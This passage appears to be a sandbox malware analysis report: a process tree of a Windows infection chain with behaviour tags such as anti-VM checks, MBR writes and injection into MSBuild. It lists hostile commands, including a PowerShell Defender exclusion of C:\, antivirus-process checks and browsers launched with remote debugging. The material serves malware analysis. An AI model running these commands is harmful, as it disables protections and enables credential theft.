PID 4204 wrote to memory of 1308	4204	rapes.exe	104
PID 4204 wrote to memory of 1308	4204	rapes.exe	104
PID 1308 wrote to memory of 5136	1308	TbV75ZR.exe	105
PID 1308 wrote to memory of 5136	1308	TbV75ZR.exe	105
PID 1308 wrote to memory of 5136	1308	TbV75ZR.exe	105
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 1308 wrote to memory of 5140	1308	TbV75ZR.exe	106
PID 5140 wrote to memory of 6232	5140	MSBuild.exe	108
PID 5140 wrote to memory of 6232	5140	MSBuild.exe	108
PID 5140 wrote to memory of 6232	5140	MSBuild.exe	108
PID 5140 wrote to memory of 6232	5140	MSBuild.exe	108
PID 5140 wrote to memory of 6232	5140	MSBuild.exe	108
PID 1820 wrote to memory of 6796	1820	tzutil.exe	112
PID 1820 wrote to memory of 6796	1820	tzutil.exe	112
PID 4204 wrote to memory of 7564	4204	rapes.exe	114
PID 4204 wrote to memory of 7564	4204	rapes.exe	114
PID 4204 wrote to memory of 7564	4204	rapes.exe	114
PID 4204 wrote to memory of 8120	4204	rapes.exe	115
PID 4204 wrote to memory of 8120	4204	rapes.exe	115
PID 8120 wrote to memory of 8188	8120	EPTwCQd.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:1044
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:6232
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  PID:16640

C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
"C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1352
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4204
- - C:\Users\Admin\AppData\Local\Temp\10337510101\u75a1_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10337510101\u75a1_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4588
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1820
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:14268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6796
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:4744
      - C:\Users\Admin\AppData\Local\Temp\{b40806e2-c6fa-4f07-99d9-7ed43846ae31}\75a55d39.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{b40806e2-c6fa-4f07-99d9-7ed43846ae31}\75a55d39.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\{0eed169f-2932-4fdb-88b4-e035bf2ca795}\d9d42f7b.exe
        
        C:/Users/Admin/AppData/Local/Temp/{0eed169f-2932-4fdb-88b4-e035bf2ca795}/\d9d42f7b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:12704
- - C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3292
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1700
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1248
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1056
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4900
- - C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
    "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1308
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:5136
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5140
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 512
        5⤵
        Program crash
        
        PID:1036
- - C:\Users\Admin\AppData\Local\Temp\10340260101\7a2ca10ed6.exe
    "C:\Users\Admin\AppData\Local\Temp\10340260101\7a2ca10ed6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:7564
- - C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
    "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:8120
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:8188
- - C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
    "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:8756
- - C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe
    "C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:8960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:9028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:9472
- - C:\Users\Admin\AppData\Local\Temp\10359820261\martin\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\10359820261\martin\installer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:9964
- - C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:10460
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:10720
    - - C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:11588
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:11804
    - - C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:13364
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:9352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe33eddcf8,0x7ffe33eddd04,0x7ffe33eddd10
        8⤵
        
        PID:9372
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1912,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1884 /prefetch:2
        8⤵
        
        PID:11920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2188,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2200 /prefetch:11
        8⤵
        
        PID:11988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2340,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2344 /prefetch:13
        8⤵
        
        PID:12280
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3232 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:12528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3448,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3472 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:12572
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3940,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3852 /prefetch:9
        8⤵
        Uses browser remote debugging
        
        PID:12988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4616 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:13196
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5144,i,2102973543596895405,1144133824605986475,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5148 /prefetch:14
        8⤵
        
        PID:9512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:8448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x248,0x24c,0x250,0x244,0x2bc,0x7ffe3353f208,0x7ffe3353f214,0x7ffe3353f220
        8⤵
        
        PID:9096
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1908,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=2140 /prefetch:11
        8⤵
        
        PID:10556
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2028,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=2024 /prefetch:2
        8⤵
        
        PID:10536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1372,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=2492 /prefetch:13
        8⤵
        
        PID:10740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3492,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:12920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3504,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:13080
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=2520,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:11876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4172,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=4188 /prefetch:9
        8⤵
        Uses browser remote debugging
        
        PID:12520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4252,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=4288 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:11664
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4212,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:9
        8⤵
        Uses browser remote debugging
        
        PID:13164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5076,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=5332 /prefetch:14
        8⤵
        
        PID:13808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3824,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:14
        8⤵
        
        PID:14132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5568,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=5724 /prefetch:14
        8⤵
        
        PID:6476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5620,i,13843763686854223722,17335412784355107198,262144 --variations-seed-version --mojo-platform-channel-handle=5764 /prefetch:14
        8⤵
        
        PID:3960
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:5528
        
        C:\ProgramData\l6890zc2db.exe
        
        "C:\ProgramData\l6890zc2db.exe"
        7⤵
        
        PID:13480
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:13728
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:3984
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:13856
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:6464
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:13108
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:14092
        
        C:\ProgramData\gvs00r1nym.exe
        
        "C:\ProgramData\gvs00r1nym.exe"
        7⤵
        
        PID:12840
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        9⤵
        Uses browser remote debugging
        
        PID:33200
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe33eddcf8,0x7ffe33eddd04,0x7ffe33eddd10
        10⤵
        
        PID:33544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1840,i,2287239991902363539,8587965660113141562,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:11
        10⤵
        
        PID:34356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2468,i,2287239991902363539,8587965660113141562,262144 --variations-seed-version --mojo-platform-channel-handle=2464 /prefetch:2
        10⤵
        
        PID:34364
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
